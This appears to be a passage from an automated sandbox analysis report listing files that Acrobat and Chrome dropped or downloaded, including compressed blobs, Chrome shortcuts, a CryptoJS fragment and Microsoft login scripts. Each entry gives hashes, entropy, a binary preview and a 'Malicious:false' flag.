                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                                                Category:dropped
                                                                                                Size (bytes):1407294
                                                                                                Entropy (8bit):7.97605879016224
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:6Dbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WL07oXGZGwYIGNPJF:cb3mlind9i4ufFXpAXkrfUs0jWLxXGZY
                                                                                                MD5:279B811F8FB7ED83618C0B37825CCF25
                                                                                                SHA1:5718DA0EF8F5A938CB88800665F18C9B805208B2
                                                                                                SHA-256:2AF4D3CE45FACE3A6DF83A17E90912767BE01A6F2C96AD8B3F270FDB13F77E46
                                                                                                SHA-512:74A736359646F91F28AC496DFFF249D0E5B005AA6BB34DAFDDE3C2A29B70D52E6F865239579AC94540AAB0D20BFC03AE6501814358D2122FCB60A4591213A9B9
                                                                                                Malicious:false
                                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                Category:dropped
                                                                                                Size (bytes):758601
                                                                                                Entropy (8bit):7.98639316555857
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                MD5:3A49135134665364308390AC398006F1
                                                                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                Malicious:false
                                                                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                Category:dropped
                                                                                                Size (bytes):386528
                                                                                                Entropy (8bit):7.9736851559892425
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                Malicious:false
                                                                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 12:48:09 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2677
                                                                                                Entropy (8bit):3.973435639815138
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8Ud+T6OWH6idAKZdA19ehwiZUklqehly+3:8NzTqy
                                                                                                MD5:C2BD6EC285B743AB89CEEC5D978166C3
                                                                                                SHA1:F75299B895EC64F44ECFDD452FEC50AAE6B38A87
                                                                                                SHA-256:8F5BFB68545A1507EF292EA9E4D40AEB906C5EC14BE66BD5B8B0FD0693000828
                                                                                                SHA-512:1818F15A2825A9580F6C92DD369FCD5F0E8D51000E14B50B6C5038DA06DE67AF190E96A50B9DA03D198A480AA63DB45CE06BC880D244737CCFCFB23F72EDCBDB
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,.....)...a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 12:48:09 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2679
                                                                                                Entropy (8bit):3.9886218634943753
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8wd+T6OWH6idAKZdA1weh/iZUkAQkqehay+2:8Bzh9Qny
                                                                                                MD5:FCF423ADB06B9E004702F6983E4F5D80
                                                                                                SHA1:8C1B937D61A72E1FCEA73B5C23786F2AE903E80F
                                                                                                SHA-256:97C5D07D3E988E0CF128906DC48BF578F278178D352DCFCB43622BA6C188BECD
                                                                                                SHA-512:F4470EAB9D5B662E5D12F4FC35C297BB81782FD03AEDD53C478A1D05CE36F0F15C950FDEAE5D6EAF7FA698A2311BFF2289BD4F070EE4C0FBB88CD8CD806A6956
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2693
                                                                                                Entropy (8bit):4.0032964609980395
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8xid+T6OsH6idAKZdA14tseh7sFiZUkmgqeh7sMy+BX:8xfz3nmy
                                                                                                MD5:77608E0A24C9B9E1F87BB45A1E1FF3C5
                                                                                                SHA1:290AE724834A600138F0B3C2478AF3170977D066
                                                                                                SHA-256:4F5C07BB917DFE4C89682825F3506E0FAFB2F073929E83A50B8306465BA406F1
                                                                                                SHA-512:4052CCDF2137A9B3E6F122A22F66437F31042696EA6C31C588E3A84280CF18B6E29D66637F7B3F36323C7C8AD10F09A45B6A7ADC1D8D967C8086E81FA377EAF9
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 12:48:09 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2681
                                                                                                Entropy (8bit):3.9910965002885743
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8id+T6OWH6idAKZdA1vehDiZUkwqehey+R:8fzCky
                                                                                                MD5:00097F5EF49B9423ED691672D7300373
                                                                                                SHA1:1D0AF9FF35A82C7F6423A9EA5336B7FC56B4501D
                                                                                                SHA-256:1BFD57C73FC210762A3C6109E4314ED751DAC3C70162130B85862833E1AA0E36
                                                                                                SHA-512:ABC3A7D38A6AACA96CD7FF208D33725F03C1AD049F69E99E29125C9C48F722C78686FBCB9E0981C4FF300EC4D1A64D1F73D6FDA63E40D406C8BE6441A5863CBA
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 12:48:09 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2681
                                                                                                Entropy (8bit):3.977033429436152
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8NHd+T6OWH6idAKZdA1hehBiZUk1W1qehoy+C:8yzy9Iy
                                                                                                MD5:59C619B8D2A5B4D7BEC384BA72FE4341
                                                                                                SHA1:36FCE0FA12FF3386AD29A9611869791697967968
                                                                                                SHA-256:0CA06EB115216EA37731296481D17F9B0081A7AB8E2B3E2234C58D2A8F37EC9F
                                                                                                SHA-512:1FC0D239717D6A49E57577E9B150BB7EDB10EAEDEA9AFA43E33B1662A42EB002630751387DA534F9738D38EE32C8F0CCD721E05ABA0E57D9873E6B418B6995F5
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,....(....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 12:48:09 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):2683
                                                                                                Entropy (8bit):3.9888459497046655
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:8Md+T6OWH6idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8FzsT/TbxWOvTbmy7T
                                                                                                MD5:88FD62D44991BBCD3327DDB09BEC2851
                                                                                                SHA1:BB7E7ED08EF8BE8B34D0908F58B75D6A42C302C4
                                                                                                SHA-256:6DB7769462E6E7AACA762AFF87D3315351CCD98B2D04217AC5350BB1B192AD09
                                                                                                SHA-512:8CE7672FC8E069A1911521039B280341F29040A04DB57C54C98BC59A7926D04268FB1DDC0DA5176E8908D33106F055BF00CD857F9C59944071611723C4B38982
                                                                                                Malicious:false
                                                                                                Preview:L..................F.@.. ...$+.,........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.n....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.n....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.n....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.n..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-+0.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):48316
                                                                                                Entropy (8bit):5.6346993394709
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                Malicious:false
                                                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                Category:downloaded
                                                                                                Size (bytes):61052
                                                                                                Entropy (8bit):7.996159932827634
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                                                Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):3452
                                                                                                Entropy (8bit):5.117912766689607
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                Malicious:false
                                                                                                URL:https://login.live.com/Me.htm?v=3
                                                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                Category:dropped
                                                                                                Size (bytes):61052
                                                                                                Entropy (8bit):7.996159932827634
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                Malicious:false
